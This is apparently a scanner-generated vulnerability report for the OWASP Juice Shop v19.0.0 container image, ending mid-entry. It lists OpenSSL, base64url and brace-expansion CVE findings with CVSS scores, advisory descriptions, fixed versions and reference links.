bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

openssl: OpenSSL: Denial of Service via type confusion in PKCS#7 signature verification
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.18-1~deb12u2

+

Issue summary: A type confusion vulnerability exists in the signature
+verification of signed PKCS#7 data where an ASN1_TYPE union member is
+accessed without first validating the type, causing an invalid or NULL
+pointer dereference when processing malformed PKCS#7 data.

+

Impact summary: An application performing signature verification of PKCS#7
+data or calling directly the PKCS7_digest_from_attributes() function can be
+caused to dereference an invalid or NULL pointer when reading, resulting in
+a Denial of Service.

+

The function PKCS7_digest_from_attributes() accesses the message digest attribute
+value without validating its type. When the type is not V_ASN1_OCTET_STRING,
+this results in accessing invalid memory through the ASN1_TYPE union, causing
+a crash.

+

Exploiting this vulnerability requires an attacker to provide a malformed
+signed PKCS#7 to an application that verifies it. The impact of the
+exploit is just a Denial of Service, the PKCS7 API is legacy and applications
+should be using the CMS API instead. For these reasons the issue was
+assessed as Low severity.

+

The FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,
+as the PKCS#7 parsing implementation is outside the OpenSSL FIPS module
+boundary.

+

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.

+ + +
Mitigation
+

3.0.18-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:1473
+https://access.redhat.com/security/cve/CVE-2026-22796
+https://bugzilla.redhat.com/2430375
+https://bugzilla.redhat.com/2430376
+https://bugzilla.redhat.com/2430377
+https://bugzilla.redhat.com/2430378
+https://bugzilla.redhat.com/2430379
+https://bugzilla.redhat.com/2430380
+https://bugzilla.redhat.com/2430381
+https://bugzilla.redhat.com/2430386
+https://bugzilla.redhat.com/2430387
+https://bugzilla.redhat.com/2430388
+https://bugzilla.redhat.com/2430389
+https://bugzilla.redhat.com/2430390
+https://bugzilla.redhat.com/show_bug.cgi?id=2430375
+https://bugzilla.redhat.com/show_bug.cgi?id=2430376
+https://bugzilla.redhat.com/show_bug.cgi?id=2430377
+https://bugzilla.redhat.com/show_bug.cgi?id=2430378
+https://bugzilla.redhat.com/show_bug.cgi?id=2430379
+https://bugzilla.redhat.com/show_bug.cgi?id=2430380
+https://bugzilla.redhat.com/show_bug.cgi?id=2430381
+https://bugzilla.redhat.com/show_bug.cgi?id=2430386
+https://bugzilla.redhat.com/show_bug.cgi?id=2430387
+https://bugzilla.redhat.com/show_bug.cgi?id=2430388
+https://bugzilla.redhat.com/show_bug.cgi?id=2430389
+https://bugzilla.redhat.com/show_bug.cgi?id=2430390
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796
+https://errata.almalinux.org/9/ALSA-2026-1473.html
+https://errata.rockylinux.org/RLSA-2026:1473
+https://github.com/advisories/GHSA-r9hf-rxjm-gv2f
+https://github.com/openssl/openssl/commit/2502e7b7d4c0cf4f972a881641fe09edc67aeec4
+https://github.com/openssl/openssl/commit/572844beca95068394c916626a6d3a490f831a49
+https://github.com/openssl/openssl/commit/7bbca05be55b129651d9df4bdb92becc45002c12
+https://github.com/openssl/openssl/commit/eeee3cbd4d682095ed431052f00403004596373e
+https://github.com/openssl/openssl/commit/ef2fb66ec571564d64d1c74a12e388a2a54d05d2
+https://linux.oracle.com/cve/CVE-2026-22796.html
+https://linux.oracle.com/errata/ELSA-2026-50081.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-22796
+https://openssl-library.org/news/secadv/20260127.txt
+https://ubuntu.com/security/notices/USN-7980-1
+https://ubuntu.com/security/notices/USN-7980-2
+https://www.cve.org/CVERecord?id=CVE-2026-22796

+ + + + + + + +
+
+
+
+ Finding 63: CVE-2026-31790 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 754 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

+ + +
Description
+

openssl: openssl: Information Disclosure from Uninitialized Memory via Invalid RSA Public Key
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.19-1~deb12u2

+

Issue summary: Applications using RSASVE key encapsulation to establish
+a secret encryption key can send contents of an uninitialized memory buffer to
+a malicious peer.

+

Impact summary: The uninitialized buffer might contain sensitive data from the
+previous execution of the application process which leads to sensitive data
+leakage to an attacker.

+

RSA_public_encrypt() returns the number of bytes written on success and -1
+on error. The affected code tests only whether the return value is non-zero.
+As a result, if RSA encryption fails, encapsulation can still return success to
+the caller, set the output lengths, and leave the caller to use the contents of
+the ciphertext buffer as if a valid KEM ciphertext had been produced.

+

If applications use EVP_PKEY_encapsulate() with RSA/RSASVE on an
+attacker-supplied invalid RSA public key without first validating that key,
+then this may cause stale or uninitialized contents of the caller-provided
+ciphertext buffer to be disclosed to the attacker in place of the KEM
+ciphertext.

+

As a workaround calling EVP_PKEY_public_check() or
+EVP_PKEY_public_check_quick() before EVP_PKEY_encapsulate() will mitigate
+the issue.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.1 and 3.0 are affected by this issue.

+ + +
Mitigation
+

3.0.19-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-31790
+https://github.com/advisories/GHSA-vgxx-5xj5-q97x
+https://github.com/openssl/openssl/commit/001e01db3e996e13ffc72386fe79d03a6683b5ac
+https://github.com/openssl/openssl/commit/abd8b2eec7e3f3fda60ecfb68498b246b52af482
+https://github.com/openssl/openssl/commit/b922e24e5b23ffb9cb9e14cadff23d91e9f7e406
+https://github.com/openssl/openssl/commit/d5f8e71cd0a54e961d0c3b174348f8308486f790
+https://github.com/openssl/openssl/commit/eed200f58cd8645ed77e46b7e9f764e284df379e
+https://nvd.nist.gov/vuln/detail/CVE-2026-31790
+https://openssl-library.org/news/secadv/20260407.txt
+https://ubuntu.com/security/notices/USN-8155-1
+https://www.cve.org/CVERecord?id=CVE-2026-31790
+https://www.openwall.com/lists/oss-security/2026/04/07/11

+ + + + + + + +
+
+
+
+ Finding 70: GHSA-rvg8-pwq2-xj7q Base64url 0.0.6 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
base64url0.0.6
+ + + + + + + +
File Path
juice-shop/node_modules/base64url/package.json
+
+
+
+ + + + + +
Description
+

Out-of-bounds Read in base64url
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.0.0

+

Versions of base64url before 3.0.0 are vulnerable to to +out-of-bounds reads as it allocates uninitialized Buffers when number is + passed in input on Node.js 4.x and below.

+

Recommendation

+

Update to version 3.0.0 or later.

+ + +
Mitigation
+

3.0.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/brianloveswords/base64url
+https://github.com/brianloveswords/base64url/commit/4fbd954a0a69e9d898de2146557cc6e893e79542
+https://github.com/brianloveswords/base64url/pull/25
+https://hackerone.com/reports/321687

+ + + + + + + +
+
+
+
+ Finding 71: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/archiver-utils/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 72: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/archiver/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 73: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/file-js/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 74: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/fstream/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 75: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/grunt/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 76: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/ignore-walk/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 77: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 78: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/replace/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 79: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
